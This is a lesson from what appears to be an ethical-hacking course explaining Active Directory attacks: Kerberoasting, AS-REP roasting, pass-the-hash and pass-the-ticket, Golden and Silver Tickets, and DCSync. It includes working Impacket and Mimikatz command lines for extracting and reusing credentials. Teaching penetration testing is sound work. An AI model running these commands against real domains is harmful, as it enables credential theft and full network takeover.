Ethical Hacking Active Directory Attacks

Active Directory (AD) is Microsoft's directory service that manages authentication and authorization across Windows-based enterprise networks. Nearly every medium-to-large organization runs Active Directory. It controls who can log in to which computer, what resources each user can access, and how policies are enforced across thousands of machines from a central point.

Because Active Directory is the backbone of Windows enterprise environments, compromising it means compromising everything the organization owns. Domain Admin — the highest privilege in Active Directory — grants complete control over every Windows machine in the network. This makes AD the ultimate target in most enterprise penetration tests.

Active Directory Key Concepts

Domain

A domain is a collection of objects — users, computers, printers, and groups — managed by a central authority. All objects in the domain share a common namespace (e.g., company.local) and authentication database.

Domain Controller (DC)

The domain controller is the server that runs Active Directory Domain Services. It authenticates all login requests, enforces Group Policy, and stores the AD database (NTDS.dit) containing every user's credential hash. Compromising the domain controller means access to every credential in the organization.

Kerberos Authentication

Active Directory uses the Kerberos protocol for authentication. When a user logs in:

  1. The user's workstation requests a Ticket Granting Ticket (TGT) from the domain controller's Key Distribution Center (KDC).
  2. The KDC verifies the password hash and issues an encrypted TGT.
  3. When the user accesses a service (a file server, a database), the workstation presents the TGT and requests a service ticket.
  4. The service ticket allows access to the specific resource.

Kerberos tickets are stored in memory. Extracting them enables attackers to authenticate to services as the ticket holder without knowing their password.

LDAP Enumeration and BloodHound

Before attacking Active Directory, an ethical hacker maps the domain structure. BloodHound is the most powerful tool for this purpose. It collects data about AD users, groups, computers, and their relationships using LDAP queries, then visualizes the entire domain as a graph — showing attack paths from any user account to Domain Admin.

BloodHound Attack Path Example

BloodHound might reveal: "Standard User A is a member of Help Desk Group → Help Desk Group has GenericAll permission on User B → User B is a member of Domain Admins." This three-hop path shows the ethical hacker exactly how to escalate from a standard account to Domain Admin, even without any vulnerability exploitation — purely by abusing legitimate AD relationships.

Data collector: SharpHound (runs on the domain) or BloodHound.py (runs from Kali Linux).

Kerberoasting

Kerberoasting is one of the most common and effective Active Directory attacks. It targets service accounts that have a Service Principal Name (SPN) registered in Active Directory.

How Kerberoasting Works

Any authenticated domain user can request a service ticket for any service with an SPN. The service ticket is encrypted with the service account's password hash. The attacker requests service tickets for all SPN-registered accounts and takes the encrypted tickets offline for cracking. If the service account password is weak, the attacker recovers it from the ticket without ever touching the domain controller.

Service accounts often have weak, static passwords set years ago — they never expire because changing them requires updating every application that uses them. Kerberoasting frequently yields valid domain credentials.

GetUserSPNs.py -request -dc-ip 192.168.1.10 company.local/user:password

The extracted hashes are cracked with Hashcat using hash type -m 13100 (Kerberos 5 TGS-REP).

AS-REP Roasting

AS-REP Roasting targets accounts that have "Do not require Kerberos preauthentication" enabled. Kerberos preauthentication is a security feature that requires the client to encrypt a timestamp with their password hash before the KDC issues a TGT. Accounts without this protection allow any unauthenticated user to request a TGT-style response encrypted with that account's password hash — which can then be cracked offline.

GetNPUsers.py company.local/ -usersfile userlist.txt -dc-ip 192.168.1.10

Pass-the-Hash in Active Directory

In Windows environments using NTLM authentication (which AD falls back to in some scenarios), the password hash itself authenticates the user — no plaintext password required. An attacker who extracts an administrator's NTLM hash from one machine uses it directly to authenticate to other machines that share the same administrator account.

Tools: Impacket's psexec.py, CrackMapExec, Mimikatz

psexec.py -hashes :NTLMHASH administrator@192.168.1.20

Pass-the-Ticket

Kerberos tickets (TGTs and service tickets) are stored in memory on Windows machines. An attacker with local admin or SYSTEM access extracts these tickets using Mimikatz and injects them into their own session — authenticating as the original ticket holder to any service that ticket grants access to, even after the original user has logged out.

mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt ticket.kirbi

Golden Ticket Attack

The Golden Ticket is one of the most powerful attacks in Active Directory. To create one, the attacker needs:

  • The domain name
  • The domain SID
  • The NTLM hash of the KRBTGT account — the special service account whose key encrypts all TGTs in the domain

With the KRBTGT hash, the attacker forges a TGT for any account, with any group memberships, valid for any duration. This forged ticket is accepted as legitimate by every machine in the domain because it is correctly signed with the KRBTGT key. The attacker effectively becomes any user in the domain — including Domain Admin — for as long as they want, even if the real Domain Admin password is changed.

Recovering from a Golden Ticket attack requires changing the KRBTGT account password twice (invalidating all existing TGTs) and resetting all domain administrator passwords.

Silver Ticket Attack

A Silver Ticket is a forged service ticket for a specific service. It requires only the service account's hash — not the KRBTGT hash. Silver Tickets are harder to detect than Golden Tickets because they are validated by the service itself rather than the domain controller. The attacker forges access to a specific service — an SQL server, a web application, a file share — without ever contacting the DC.

DCSync Attack

Domain controllers replicate their database to each other. Any account with Directory Replication permissions can request this replication data. The attacker uses Mimikatz's DCSync feature to simulate a domain controller and request the password hashes of all accounts — including the KRBTGT and every Domain Admin — directly from a real domain controller, without logging into the DC or running code on it.

mimikatz # lsadump::dcsync /domain:company.local /user:Administrator

This retrieves the Administrator's NTLM hash directly. From there, a pass-the-hash attack provides full domain access.

Active Directory Attack Path Diagram

Think of Active Directory as a medieval kingdom with a royal court:

  • Kingdom (domain) — Contains all subjects and resources
  • Castle keep (domain controller) — Holds the keys to everything
  • Crown jewels (KRBTGT hash) — Used to forge any golden passport
  • Court messenger (Kerberos KDC) — Issues and validates passes
  • Nobility (privileged service accounts) — Targeted by Kerberoasting
  • Peasants with keys (standard users with delegation permissions) — Attack paths found by BloodHound

An ethical hacker who reaches the Crown Jewels (KRBTGT hash) has effectively won the entire kingdom.

Key Points

  • Active Directory controls all authentication and authorization in Windows enterprise environments; Domain Admin is the ultimate prize.
  • BloodHound maps AD relationships and identifies attack paths from any user to Domain Admin.
  • Kerberoasting extracts service ticket hashes for offline cracking without any special privileges.
  • AS-REP Roasting targets accounts without Kerberos preauthentication enabled.
  • Golden Ticket attacks forge TGTs using the KRBTGT hash, granting persistent, undetectable domain access.
  • DCSync requests credential replication from a domain controller without logging into it.
Previous lessons
Back to courses
Next lessons

Leave a Comment